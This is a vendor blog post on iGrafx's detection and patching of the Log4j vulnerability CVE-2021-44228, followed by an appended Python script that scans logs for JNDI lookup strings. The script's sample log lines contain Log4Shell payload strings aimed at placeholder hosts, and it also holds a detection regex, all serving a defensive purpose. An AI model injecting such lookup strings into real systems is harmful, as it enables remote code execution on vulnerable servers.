iGrafx Thwarts Log4j Vulnerability
Early detection and remediation of the recent Log4j vulnerability by security teams helps to protect BPM customers from loss.
A report from NTT Application Security found that businesses and agencies spend about 250 days to remediate high-severity risks. At iGrafx we know how essential secure systems are to our business process management (BPM) customers. By taking a proactive approach, the iGrafx team identified and mitigated the recent Log4j vulnerability. This move protects business customers from significant losses.
Identifying the Log4j Vulnerability
On December 11, the US Cybersecurity and Infrastructure Security Agency (CISA) released a statement about the dangers of the Log4j vulnerability.
“CISA is working closely with our partners to address a critical vulnerability containing the log4j software,” stated CISA Director, Jen Easterly. “This vulnerability is being widely exploited by a growing set of threat actors, presents an urgent challenge to network defenders given its broad use. End users will be reliant on their vendors, and the vendor community must immediately identify, mitigate, and patch the wide array of products using this software. Vendors should also be communicating with their customers to ensure end users know that their product contains this vulnerability and should prioritize software updates.”
The vulnerability, CVE-2021-44228, abuses Log4j's ability to perform JNDI lookups against LDAP, a common third-party enterprise directory service, and against other JNDI-related endpoints. If an attacker controls the content of a log message, that individual or organization could cause the server to load and execute malicious code from an LDAP server.
Any feature that can be exploited to execute malicious code on a server could cause harm. That is why this zero-day bug was rated a 10 on a criticality scale of 1 to 10.
Recognition and Remediation
At iGrafx, we actively monitor vulnerability exploits through various means. In this case, the team was aware of it early on Friday morning, December 10. Our cross-functional global team coordinated to resolve the vulnerability over the weekend to ensure limited exposure. Working in round-the-clock shifts, the organization committed to making sure that customer data was safe.
We can now confirm that:
- Within 12 hours we fixed and deployed the new release to our cloud customers that approved updates of this type
- Within 48 hours we fixed and deployed the release to our datacenter customers
- All customers were contacted and informed of the vulnerability, as well as the steps iGrafx took to remediate it
Going Forward
We continue to analyze the logs of our cloud services to identify any attempts to leverage the exploit. We have not found any attempts to date. For more information about iGrafx BPM solutions, security, or the Log4j vulnerability, please contact us.
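The kind of log review described above can be sketched as follows. This is an added example, not iGrafx's code or tooling; the access-log format, the names scan and normalise, and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Matches a Log4j JNDI lookup such as ${jndi:ldap://host/a}; captures the scheme.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)
# Leading client address of a combined-format access log line (assumed format).
CLIENT = re.compile(r"^(\S+) ")


def normalise(text, max_rounds=3):
    """Undo up to max_rounds layers of percent-encoding so %24%7Bjndi... is visible."""
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def scan(lines):
    """Return one finding per log line that contains a JNDI lookup string."""
    findings = []
    for number, raw in enumerate(lines, start=1):
        match = JNDI_LOOKUP.search(normalise(raw))
        if not match:
            continue
        client = CLIENT.match(raw)
        findings.append({
            "line": number,
            "client": client.group(1) if client else "unknown",
            "scheme": match.group(1).lower(),
        })
    return findings


# Constructed sample lines (documentation addresses, .invalid hosts); not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Dec/2021:09:14:02 +0000] "GET /login HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Dec/2021:09:15:40 +0000] "GET / HTTP/1.1" 200 128 "-" "${jndi:ldap://collector.invalid/a}"',
    '203.0.113.22 - - [10/Dec/2021:09:16:11 +0000] "GET /?q=%24%7BJNDI%3Armi%3A%2F%2Fcollector.invalid%2Fb%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '198.51.100.7 - - [10/Dec/2021:09:17:30 +0000] "GET /docs/jndi-overview HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A match shows only that a lookup string reached the logs, not that it was evaluated, so each finding still needs to be correlated with outbound connections from the logging host. The pattern covers plain and percent-encoded lookups only.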